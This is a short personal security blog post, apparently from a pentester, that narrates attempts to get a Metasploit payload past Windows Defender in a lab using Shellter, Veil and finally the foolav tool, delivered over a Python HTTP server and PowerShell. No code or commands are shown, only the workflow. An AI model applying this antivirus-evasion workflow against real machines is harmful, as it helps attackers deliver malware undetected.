Few days ago I was reading one of the tutorials related to 'pentesting AD'. They are all pretty cool. You can learn a lot from the content presented by the authors. But my question is...
... why (almost;)) all of them are started from the moment "when you already have an admin account"...? What if I don't have an admin account and I'm already 'only' at the beginning of the way to get it (read as: 'I found RCE but how to store my payload there to move forward')?
During my super-lab-exercises I found that for 'default installation of Windows VM' (in case of downloading some-payload-exe) you will find an alert from Windows Defender. I would like to avoid it during normal day-to-day pentests so I decided to use "Leonardo's technique":
My first guess was shellter tool from Kali:
Installing, preparing, checking the payload from msf, starting python-m HTTP to download it:
And we are here, trying to run PS1 to get our new calc.exe:
Good god! There is a real Defender to protect us!
Well. Trying something else...
Hm. Still 'not the response I'm looking for'. :) So I decided to do a hardcore-update and install Veil:
Uh. ;Z Few more MB's for our Kali - but I hope it will help. Checking:
Go Veil, "you can do it!":
So. :]
At this moment I knew I need some solution that will solve the case here. I wasted a lot of time, so now it's time to foolav ;] (after some small talk with "one of the colleagues" I decided to check this code - and to be honest - this is what I was looking for):
Preparing Metasploit - according to the README:
Checking:
I downloaded our EXE-file using PS1:
Ok, so I received a connection but there was no shell. :S Checking:
Ok, so probably (during encoding) some part of the shellcode was changed. I tried to use some more 'normal payload' to verify my results (and I used cmd=calc.exe). Results you will find below:
In case of our "last example" - maybe you will find it useful. ;)
See you next time!
Cheers
Brak komentarzy:
Prześlij komentarz